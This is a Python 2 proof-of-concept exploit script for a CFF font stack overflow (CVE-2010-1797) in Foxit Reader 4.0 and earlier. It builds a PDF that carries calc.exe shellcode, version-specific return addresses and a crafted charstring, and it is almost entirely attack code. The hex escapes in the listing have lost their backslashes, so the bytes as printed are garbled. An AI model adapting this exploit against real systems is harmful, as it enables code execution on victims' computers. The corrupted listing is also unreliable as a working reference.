# Title : Foxit Reader <= 4.0 pdf Jailbreak Exploit
# Published : 2010-08-24
# Author : Jose Miguel Esparza
import sys,zlib
def getFFShellcode(sc):
    """Re-encode *sc* as 'xff'-prefixed groups of four characters, each group reversed.

    The input is first padded with copies of the three-character literal 'x00' until
    the author's ``len(sc) % 4`` check is satisfied in one-character units.  That literal
    reads like a hex escape (backslash, x, 0, 0) whose backslash was lost in this listing,
    so as written each padding unit is three characters long: inputs whose length is
    1 or 3 (mod 4) end up misaligned and raise IndexError in the loop, while lengths that
    are 0 or 2 (mod 4) re-encode cleanly.  The result has 5 characters per input group.
    """
    padded = sc
    remainder = len(padded) % 4
    if remainder:
        padded += 'x00' * (4 - remainder)
    pieces = []
    for start in range(0, len(padded), 4):
        # Reverse the group by explicit index so a short trailing group fails the
        # same way the original indexed form does.
        pieces.append(
            'xff'
            + padded[start + 3]
            + padded[start + 2]
            + padded[start + 1]
            + padded[start]
        )
    return ''.join(pieces)
# Banner printed to stdout before the document is generated (runtime string, kept as
# the author wrote it).
outputHeader = '''
##############################################################################################
# FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797) #
##############################################################################################
# #
# Product: Foxit Reader <= 4.0 #
# Platforms: Windows XP, Windows Vista #
# Author: Jose Miguel Esparza <jesparza AT eternal-todo DOT com> #
# Web: http://eternal-todo.com #
# Date: 2010-08-23 #
# #
##############################################################################################
'''
# Name of the generated document, written to the current working directory.
outputFileName = 'foxit_type2_poc.pdf'
# Usage text for the single positional "target" argument.  Only 0 and 1 get past the
# checks further down.  The "nn" / "nt" runs read like newline/tab escapes whose
# backslashes were lost when this listing was captured; as written they are literal letters.
usage = 'Usage: '+sys.argv[0]+' targetnnTargets:nt0 - Foxit Reader > 3.0nt1 - Foxit Reader 3.0nt2 - Other versions'
# Single-page PDF skeleton (the author credits Comex's PDF, "slightly modified").
# Objects 1-10 are ordinary page, font and descriptor structure; the component of
# interest for triage is object 11: a /FlateDecode'd /Type1C (CFF) stream referenced as
# /FontFile3 from the FontDescriptor in object 9.  Its body and /Length are filled in
# from the $CFF_STREAM and $CFF_STREAM_LENGTH placeholders below.  The xref offsets and
# the startxref value are fixed text and are not recomputed after substitution.  The
# second line's "xbexbexbaxba" reads like a binary-marker escape sequence whose
# backslashes were stripped in this listing.
COMEX_PDF_TEMPLATE = '''%PDF-1.3
%xbexbexbaxba
4 0 obj
<< /Length 631 >>
stream
q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc
7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q
1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta)
-0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4
( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT
-0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( )
-1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc
18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm
/F2.0 1 Tf ( ) Tj ET Q Q
endstream
endobj
2 0 obj
<< /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792]
>>
endobj
5 0 obj
<< /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >>
endobj
3 0 obj
<< /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >>
endobj
7 0 obj
<< /Type /Catalog /Pages 3 0 R >>
endobj
11 0 obj
<<
/Subtype/Type1C
/Filter[/FlateDecode]
/Length $CFF_STREAM_LENGTH
>>
stream
$CFF_STREAM
endstream
endobj
9 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >>
endobj
10 0 obj
[ 556 ]
endobj
8 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor
9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding
>>
endobj
1 0 obj
<< >>
endobj
xref
0 12
0000000000 65535 f
0000017767 00000 n
0000000408 00000 n
0000003397 00000 n
0000000022 00000 n
0000000389 00000 n
0000000512 00000 n
0000003361 00000 n
0000017359 00000 n
0000007240 00000 n
0000000622 00000 n
0000003340 00000 n
trailer
<< /Size 12 /Root 7 0 R /Info 1 0 R >>
startxref
17942
%%EOF
'''
# Upper bound on the 'xff'-prefixed section assembled below: 45 groups of 5 characters.
MAX_FF_SECTION_LEN = 45*5
# Per-target values, indexed by the "version" argument (0 or 1).  Every 'xNN' literal
# in this block reads like a hex escape whose backslash was stripped when the listing
# was captured; as printed each one is three ASCII characters rather than one byte, so
# the script does not reproduce the bytes these names describe.
JUMP_BYTE = ['xcd','xcc']
POP_POP_RET_ADDRESS = ['x00x40x11x85','x00x40xcex36'] # Foxit reader addresses, depending on the version
NUM_SECOND_INSTRUCTIONS_SET = [183,182]
# calc.exe shellcode (author's label; not decodable as printed, see note above)
shellcode = 'x68x10xf5x00x00x31xf6x64x8bx76x30x8bx76x0cx8bx76x1cx8bx6ex08x8bx36x8bx5dx3cx8bx5cx1dx78x01xebx8bx4bx18x67xe3xecx8bx7bx20x01xefx8bx7cx8fxfcx01xefx31xc0x99x32x17x66xc1xcax01xaex75xf7x58x66x3bxd0x50xe0xe2x75xccx8bx53x24x01xeax0fxb7x14x4ax8bx7bx1cx01xefx03x2cx97x66x3dx10xf5x75x0ex33xc0x50x68x2ex65x78x65x68x63x61x6cx63x54xffxd5x68x06xcbx00x00xebx92'
# Fixed leading bytes of the embedded CFF font that precede the crafted charstring data;
# the font name "ABCDEF+Times-Roman" and the "001.007" / "Times Roman" / "Times"
# strings are visible in it.
cff_header = 'x01x00x04x01x00x01x01x01x13ABCDEF+Times-Romanx00x01x01x01x1fxf8x1bx00xf8x1cx02xf8x1dx03xf8x19x04x1cox00rxfb<xfbnxfa|xfax16x05xe9x11x8bx8bx12x00x03x01x01x08x13x18001.007Times RomanTimesx00x00x00x02x04x00x00x00x01x00x00x00x05x00x00x04xdc'
# Argument handling: exactly one positional argument, all digits, is accepted.
if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1:
    sys.exit(usage)
version = int(sys.argv[1])
# Target 2 is a documented placeholder and anything above 2 is rejected, so only 0 and 1
# reach the list lookups below (isdigit() already rules out a negative value).  The
# trailing "n" in the message is another newline escape that lost its backslash.
if version == 2:
    sys.exit('Versions < 3.0 are not implemented, try it!! ;)n')
if version > 2:
    sys.exit(usage)
# Python 2 print statements; the script does not run unmodified under Python 3.
print outputHeader
print '[-] Creating PDF file...'
# Building the FF section
ff_shellcode = getFFShellcode(shellcode)
ff_zero_bytes = 'xffx00x00x00x00'
# Layout: 11 zero groups, the re-encoded payload, zero-group padding sized to fill
# MAX_FF_SECTION_LEN, then fixed trailing groups built from the per-target address and
# jump byte.  The '/' is Python 2 integer division; under Python 3 it yields a float and
# `float * str` raises TypeError.
ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + 'xffx90x90x8axeb' + 'xff'+POP_POP_RET_ADDRESS[version] + ('xffx00'+JUMP_BYTE[version]+'x00x00')*3
# Sanity check on the assembled length; there is no check for the section being *shorter*
# than expected.
if len(ff_instructions) > MAX_FF_SECTION_LEN:
    sys.exit('[x] FF section bigger than expected!!')
# Operators sections: three runs of repeated operator sequences, the middle one sized
# per target via NUM_SECOND_INSTRUCTIONS_SET.
first_instructions_set = 'x0cx17x0cx17x0cx04x0cx1d' * 20
second_instructions_set = 'x0cx17x0cx1d' * NUM_SECOND_INSTRUCTIONS_SET[version]
third_instructions_set = 'x0cx1dx0cx12' * 42
# Building the full CFF content for the fake charstring.  This is the data an analyst
# recovers by inflating object 11's stream from a generated document.
cff_content = cff_header + 'x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + 'x0e'
# Compress with zlib so the PDF stream can carry /Filter [/FlateDecode] (the author's
# comment said "Decoding").  zlib.compress() accepts str only under Python 2; Python 3
# requires bytes.
encoded_cff_content = zlib.compress(cff_content)
# Creating the PDF based on the Comex PDF, slightly modified: substitute the stream
# length first, then the stream body, into the fixed template.
pdf_content = COMEX_PDF_TEMPLATE
pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content)))
pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content)
# Write the document into the working directory; the file handle is never explicitly
# closed and is left to reference-counting to release.
open(outputFileName,'w').write(pdf_content)
print '[+] File "'+outputFileName+'" created, test it!!'